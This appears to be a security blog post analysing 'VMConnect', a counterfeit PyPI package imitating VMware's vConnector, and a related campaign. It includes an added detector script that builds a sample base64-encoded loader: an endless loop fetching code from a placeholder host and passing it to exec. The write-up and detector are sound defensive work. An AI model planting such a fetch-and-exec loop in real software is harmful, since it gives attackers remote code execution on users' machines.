This month, we analyzed a malicious PyPI package called ‘VMConnect,’ designed to closely resemble the legitimate VMware vSphere connector module, ‘vConnector,’ but with malicious code hidden inside.
Assigned sonatype-2023-3387 and discovered by Sonatype’s automated detection systems last week, ‘VMConnect’ contains much the same code as its legitimate counterpart and has been downloaded 225 times, according to pepy.tech.
While investigating this package, we discovered two other recently published packages, “ethter” (251 downloads) and “quantiumbase” (212 downloads), that share an identical structure and technique and carry an identical payload. Because these packages emerged within a short timeframe, each under a distinct name and aimed at a distinct target, we concluded they are part of an ongoing campaign, which we have dubbed “PaperPin.” The campaign remains an enigma in several respects, as we explain below.
VMConnect: A counterfeit VMware module
The ‘VMConnect’ package appeared on the PyPI registry on July 28th, the same day we spotted it. Its description closely mirrors that of the real VMware vSphere module:

Image above: Fake ‘VMConnect’ package (left) and the legitimate ‘vconnector’ Python module (right)
The ‘setup.py’ file within the malicious ‘VMConnect’ package loads the contents of the ‘__init__.py’ file (line 8):

This is where it gets interesting: whereas in the GitHub version (archived) of ‘VMConnect’ the __init__.py file contains only the version number, the release published to PyPI is starkly different.

The __init__.py within the PyPI package, purportedly published by the same user (“hushki502”), runs base64-encoded code (line 25):

Sonatype’s Senior Security Researcher Ankita Lamba, who analyzed the counterfeit package, stated that the encoded string “retrieves data from an attacker-controlled URL and attempts to execute it on the host machine. This behavior is carried out every minute, infinitely.”
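The loader pattern described above (a base64 string literal that decodes to a fetch-and-exec loop) is easy to triage statically. The script below is an added example, not code from this post or from the ‘VMConnect’ package: it parses a Python file with the `ast` module, tries to base64-decode every string literal into parseable Python, and then reports whether the decoded payload calls exec/eval, performs a network fetch, and runs inside an infinite loop with a sleep. The sample `__init__.py` it scans is constructed for the example, and `http://example.invalid/p` is a reserved, non-routable placeholder, not the actual attacker URL.

```python
"""Static triage of a Python package file for a base64-encoded exec loader.

Added example, not code from the Sonatype post or from the 'VMConnect'
package. It scans Python source for string literals that base64-decode to
parseable Python, then reports what the decoded payload does: exec/eval,
network fetch, and an infinite sleep loop. The sample module below is
constructed for this example; 'example.invalid' is a reserved name, not
the attacker's real URL.
"""
import ast
import base64
import binascii

# Constructed stand-in for a malicious __init__.py. The inner payload is
# written in the clear here and then base64-encoded, so the detector gets
# a realistic but harmless, fully offline input.
_INNER = '''
import time, urllib.request
while True:
    try:
        code = urllib.request.urlopen("http://example.invalid/p").read()
        exec(code)
    except Exception:
        pass
    time.sleep(60)
'''
SAMPLE_INIT_PY = (
    "__version__ = '0.1'\n"
    "import base64\n"
    f"exec(base64.b64decode('{base64.b64encode(_INNER.encode()).decode()}'))\n"
)

EXEC_NAMES = {"exec", "eval"}
FETCH_NAMES = {"urlopen", "urlretrieve", "get", "post"}


def _decode_b64_source(s: str):
    """Return decoded Python source if `s` is base64 of non-empty parseable code."""
    if len(s) < 16:  # short literals are never a meaningful payload
        return None
    try:
        text = base64.b64decode(s, validate=True).decode("utf-8")
        tree = ast.parse(text)
    except (binascii.Error, UnicodeDecodeError, SyntaxError, ValueError):
        return None
    return text if tree.body else None


def _call_name(node: ast.Call) -> str:
    """Name of the called function: `exec` for exec(...), `urlopen` for x.urlopen(...)."""
    f = node.func
    if isinstance(f, ast.Name):
        return f.id
    if isinstance(f, ast.Attribute):
        return f.attr
    return ""


def analyze_payload(src: str) -> dict:
    """Summarise the behaviour of decoded payload source."""
    report = {"exec": False, "fetch": False, "infinite_loop": False, "sleep": False}
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Call):
            name = _call_name(node)
            if name in EXEC_NAMES:
                report["exec"] = True
            if name in FETCH_NAMES:
                report["fetch"] = True
            if name == "sleep":
                report["sleep"] = True
        elif isinstance(node, ast.While):
            # `while True:` literal; the loop never terminates on its own
            if isinstance(node.test, ast.Constant) and node.test.value is True:
                report["infinite_loop"] = True
    return report


def scan_source(src: str) -> list:
    """Find base64 string literals that decode to Python and analyse each one."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            decoded = _decode_b64_source(node.value)
            if decoded is None:
                continue
            findings.append({
                "line": node.lineno,
                "decoded": decoded,
                "behaviour": analyze_payload(decoded),
            })
    return findings


def is_remote_exec_loader(src: str) -> bool:
    """True when an encoded payload fetches remote data, executes it, and loops forever."""
    return any(
        f["behaviour"]["exec"] and f["behaviour"]["fetch"] and f["behaviour"]["infinite_loop"]
        for f in scan_source(src)
    )


if __name__ == "__main__":
    for finding in scan_source(SAMPLE_INIT_PY):
        print(f"line {finding['line']}: {finding['behaviour']}")
    print("remote exec loader:", is_remote_exec_loader(SAMPLE_INIT_PY))
```

Run it against a package's `__init__.py` and `setup.py` by reading the file and passing the text to `scan_source`; a finding with all three of `exec`, `fetch` and `infinite_loop` set is the signature the post describes. The decoder deliberately only accepts literals that parse as non-empty Python, so ordinary base64 data (icons, test fixtures) is ignored rather than flagged.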
The (Read more...)